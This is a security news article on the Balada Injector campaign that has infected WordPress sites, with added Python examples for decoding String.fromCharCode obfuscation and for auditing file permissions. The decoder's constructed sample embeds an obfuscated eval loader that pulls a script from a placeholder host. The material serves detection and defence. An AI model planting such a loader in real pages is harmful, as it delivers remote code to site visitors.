Over one million WordPress websites are estimated to have been infected by an ongoing campaign to deploy malware called Balada Injector since 2017. The massive campaign, per GoDaddy’s Sucuri, “leverages all known and recently discovered theme and plugin vulnerabilities” to breach WordPress sites. The attacks are known to play out in waves once every few weeks.
Diverse Infection Methods
“This campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of freshly registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites,” security researcher Denis Sinegubko said. The websites include fake tech support, fraudulent lottery wins, and rogue CAPTCHA pages urging users to turn on notifications to ‘Please Allow to verify, that you are not a robot,’ thereby enabling the actors to send spam ads.
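The fingerprint Sinegubko describes, `String.fromCharCode` obfuscation, is also the easiest one to hunt for. The following is an added example (not Sucuri's tooling) that scans text for `String.fromCharCode(...)` calls with numeric argument lists, decodes them so an analyst can read the real payload, and pulls out any URLs for domain triage. The injected footer and the `example-placeholder.test` hostname are constructed sample data, not indicators from the report.

```python
"""Flag and decode String.fromCharCode-obfuscated script injections.

Added example for triage of infected WordPress files; the sample input and
the placeholder domain are constructed and not taken from the campaign.
"""
import re

# Matches String.fromCharCode(104, 116, ...) where every argument is a number.
FROMCHARCODE_RE = re.compile(
    r"String\s*\.\s*fromCharCode\s*\(\s*((?:\d{1,3}\s*,\s*)*\d{1,3})\s*\)",
    re.IGNORECASE,
)


def decode_fromcharcode(arg_list: str) -> str:
    """Turn '104, 116, 116, 112' into 'http'."""
    return "".join(chr(int(n)) for n in re.split(r"\s*,\s*", arg_list.strip()))


def find_obfuscated_strings(text: str, min_length: int = 8):
    """Decode every fromCharCode call in text; ignore short ones to cut noise
    from legitimate scripts that build a character or two this way."""
    hits = []
    for m in FROMCHARCODE_RE.finditer(text):
        decoded = decode_fromcharcode(m.group(1))
        if len(decoded) >= min_length:
            hits.append(decoded)
    return hits


def extract_urls(decoded_strings):
    """Pull URLs out of decoded payloads so the hosting domains can be reviewed."""
    url_re = re.compile(r"https?://[A-Za-z0-9.\-]+[^\s'\"<>]*")
    return sorted({u for s in decoded_strings for u in url_re.findall(s)})


def to_fromcharcode(s: str) -> str:
    """Used only to build the constructed sample: encode text as a fromCharCode call."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in s) + ")"


# Constructed sample: a theme footer with an obfuscated remote-script loader
# appended. The hostname is a placeholder, not an indicator from the report.
LOADER = (
    'var s=document.createElement("script");'
    's.src="https://abc123.example-placeholder.test/x.js";'
    "document.head.appendChild(s);"
)
SAMPLE_FOOTER = (
    "<footer>Thanks for visiting</footer>\n"
    "<script>eval(" + to_fromcharcode(LOADER) + ");</script>\n"
    "<!-- end -->"
)

if __name__ == "__main__":
    payloads = find_obfuscated_strings(SAMPLE_FOOTER)
    for p in payloads:
        print("decoded:", p)
    print("urls:", extract_urls(payloads))
```

In practice this runs over theme and plugin files, `wp_posts` content, and the `wp_options` table, and the decoded URLs are checked against domain registration dates, since the campaign favours freshly registered domains.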
The report builds on recent findings from Doctor Web, which detailed a Linux malware family that exploits flaws in more than two dozen plugins and themes to compromise vulnerable WordPress sites. In the intervening years, Balada Injector has relied on over 100 domains and a plethora of methods to take advantage of known security flaws (e.g., HTML injection and Site URL injection), with the attackers primarily attempting to obtain the database credentials stored in the wp-config.php file.
The malware ultimately enables the attackers to create fake WordPress admin users, harvest data stored on the underlying hosts, and leave backdoors for persistent access. Balada Injector further carries out broad searches from the top-level directories of the compromised website's file system to locate writable directories that belong to other sites.
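Two of the conditions the malware exploits, readable wp-config.php credentials and directories of neighbouring sites that are writable from the same account, can be audited from the hosting account itself. The following is an added example (not Sucuri's tooling) that walks an account root and reports directories writable by group or others, and wp-config.php files readable by anyone other than the owner. The two-site layout it builds under a temporary directory is a constructed fixture; real layouts vary by host.

```python
"""Audit a shared-hosting account for the weaknesses Balada Injector abuses.

Added example, not Sucuri's code. The account layout below is constructed
so the audit can run offline; adjust the root path for a real account.
"""
import os
import stat
import tempfile


def find_loose_dirs(root: str):
    """Directories under root whose mode grants write to group or others.
    Symlinks are skipped so the audit stays inside the account."""
    loose = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            p = os.path.join(dirpath, d)
            try:
                mode = os.lstat(p).st_mode
            except OSError:
                continue
            if stat.S_ISLNK(mode):
                continue
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                loose.append(os.path.relpath(p, root))
    return sorted(loose)


def find_exposed_wp_configs(root: str):
    """wp-config.php files readable by group or others; these hold DB credentials."""
    exposed = []
    for dirpath, _, filenames in os.walk(root):
        if "wp-config.php" in filenames:
            p = os.path.join(dirpath, "wp-config.php")
            mode = os.lstat(p).st_mode
            if mode & (stat.S_IRGRP | stat.S_IROTH):
                exposed.append(os.path.relpath(p, root))
    return sorted(exposed)


def build_fixture() -> str:
    """Constructed account with two sites: site-a is tight, site-b has a
    world-writable uploads directory and a group/world-readable wp-config.php."""
    root = tempfile.mkdtemp(prefix="acct-")
    for site in ("site-a", "site-b"):
        uploads = os.path.join(root, site, "public_html", "wp-content", "uploads")
        os.makedirs(uploads)
        cfg = os.path.join(root, site, "public_html", "wp-config.php")
        with open(cfg, "w") as f:
            f.write("<?php // constructed placeholder, no real credentials\n")
        os.chmod(cfg, 0o600)
    # Normalise every directory to 0755 so the result does not depend on the umask...
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            os.chmod(os.path.join(dirpath, d), 0o755)
    # ...then introduce the two weaknesses the audit should catch.
    os.chmod(os.path.join(root, "site-b", "public_html", "wp-content", "uploads"), 0o777)
    os.chmod(os.path.join(root, "site-b", "public_html", "wp-config.php"), 0o644)
    return root


if __name__ == "__main__":
    account_root = build_fixture()
    print("writable by group/others:", find_loose_dirs(account_root))
    print("exposed wp-config.php:", find_exposed_wp_configs(account_root))
```

Because every site under one server account shares the same file permissions, a single loose directory anywhere in the account is enough for the cross-site spread the report describes, which is why the audit covers the whole account rather than one site.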
“Most commonly, these sites belong to the webmaster of the compromised site and they all share the same server account and the same file permissions,” Sinegubko said. “In this manner, compromising just one site can potentially grant access to several other sites ‘for free.’”
To protect their websites, WordPress users are recommended to keep their website software up-to-date, remove unused plugins and themes, and use strong WordPress admin passwords.